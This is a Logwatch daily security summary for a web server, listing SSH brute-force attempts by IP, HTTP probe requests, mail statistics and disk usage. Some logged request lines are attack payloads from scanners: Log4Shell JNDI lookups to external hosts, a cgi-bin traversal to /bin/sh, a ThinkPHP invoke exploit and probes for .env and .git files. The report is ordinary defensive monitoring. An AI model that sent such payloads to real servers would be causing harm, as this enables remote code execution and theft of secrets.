################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 17 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-16 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 23:23 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 9 sites probed the server
Requests with error response codes
400 Bad Request
null: 17 Time(s)
mstshash=Administr: 2 Time(s)
mstshash=Domain: 2 Time(s)
/.git/config: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/pVOG: 1 Time(s)
\xB1\xC5\xDC(\xE8\x00\x00\x00\x00\x00: 1 Time(s)
404 Not Found
//2018/wp-includes/wlwmanifest.xml: 1 Time(s)
//2019/wp-includes/wlwmanifest.xml: 1 Time(s)
//blog/wp-includes/wlwmanifest.xml: 1 Time(s)
//cms/wp-includes/wlwmanifest.xml: 1 Time(s)
//media/wp-includes/wlwmanifest.xml: 1 Time(s)
//news/wp-includes/wlwmanifest.xml: 1 Time(s)
//shop/wp-includes/wlwmanifest.xml: 1 Time(s)
//site/wp-includes/wlwmanifest.xml: 1 Time(s)
//sito/wp-includes/wlwmanifest.xml: 1 Time(s)
//test/wp-includes/wlwmanifest.xml: 1 Time(s)
//web/wp-includes/wlwmanifest.xml: 1 Time(s)
//website/wp-includes/wlwmanifest.xml: 1 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp-includes/wlwmanifest.xml: 1 Time(s)
//wp/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
//xmlrpc.php?rsd: 1 Time(s)
499 (undefined)
/: 5 Time(s)
/${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 30 Time(s)
/.env: 4 Time(s)
/Autodiscover/Autodiscover.xml: 2 Time(s)
/_ignition/execute-solution: 2 Time(s)
/console/: 2 Time(s)
/robots.txt: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.git/config: 1 Time(s)
/.well-known/security.txt: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/favicon.ico: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/remote/login?lang=en: 1 Time(s)
/sitemap.xml: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (159.75.216.168): 37 Time(s)
root (212.64.91.71): 34 Time(s)
root (61.160.251.98): 20 Time(s)
root (223.99.170.130): 18 Time(s)
unknown (212.64.91.71): 16 Time(s)
root (106.13.27.134): 15 Time(s)
unknown (61.160.251.98): 15 Time(s)
unknown (159.75.216.168): 13 Time(s)
root (ns3152155.ip-151-106-38.eu): 12 Time(s)
unknown (ns3152155.ip-151-106-38.eu): 10 Time(s)
root (96.78.175.36): 9 Time(s)
root (164.90.217.133): 7 Time(s)
unknown (106.13.27.134): 7 Time(s)
root (161.35.205.46): 6 Time(s)
root (177.249.43.20): 6 Time(s)
root (175.209.89.234): 5 Time(s)
unknown (164.90.217.133): 5 Time(s)
unknown (96.78.175.36): 5 Time(s)
root (117.66.243.77): 4 Time(s)
root (45.124.144.116): 3 Time(s)
unknown (223.99.170.130): 3 Time(s)
unknown (114.30.126.78.rev.sfr.net): 2 Time(s)
unknown (117.89.142.214): 2 Time(s)
unknown (161.35.205.46): 2 Time(s)
unknown (195.141.53.65): 2 Time(s)
unknown (65.212.254.95): 2 Time(s)
unknown (c193-183-241-159.customer.sandnet.se): 2 Time(s)
mysql (164.90.217.133): 1 Time(s)
news (180.250.248.169): 1 Time(s)
root (36.110.142.212): 1 Time(s)
root (oc-144-21-87-42.compute.oraclecloud.com): 1 Time(s)
unknown (117.66.243.77): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (175.209.89.234): 1 Time(s)
unknown (45.124.144.116): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
Invalid Users:
Unknown Account: 91 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
2 Miscellaneous warnings
8.896K Bytes accepted 9,109
8.896K Bytes sent via SMTP 9,109
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
26 Connections
14 Connections lost (inbound)
26 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Timeouts (inbound)
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
36.110.142.212: 1 time
45.124.144.116: 3 times
61.160.251.98: 20 times
96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 9 times
106.13.27.134: 15 times
117.66.243.77: 4 times
144.21.87.42 (oc-144-21-87-42.compute.oraclecloud.com): 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 12 times
159.75.216.168: 37 times
161.35.205.46: 6 times
164.90.217.133: 8 times
175.209.89.234: 5 times
177.249.43.20 (177.249.43.20-clientes-zap-izzi.mx): 6 times
180.250.248.169: 1 time
212.64.91.71: 34 times
223.99.170.130: 18 times
Illegal users from:
2001:470:1:332::8: 1 time
undef: 61 times
45.124.144.116: 1 time
45.141.84.10: 1 time
61.160.251.98: 15 times
64.62.197.152: 1 time
65.212.254.95: 2 times
78.126.30.114 (114.30.126.78.rev.sfr.net): 2 times
96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 5 times
106.13.27.134: 7 times
117.66.243.77: 1 time
117.89.142.214: 2 times
141.98.10.202: 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times
159.75.216.168: 13 times
161.35.205.46: 2 times
164.90.217.133: 5 times
175.209.89.234: 1 time
178.73.215.171 (178-73-215-171-static.glesys.net): 1 time
193.183.241.159 (c193-183-241-159.customer.sandnet.se): 2 times
195.141.53.65: 2 times
212.64.91.71: 16 times
223.99.170.130: 3 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################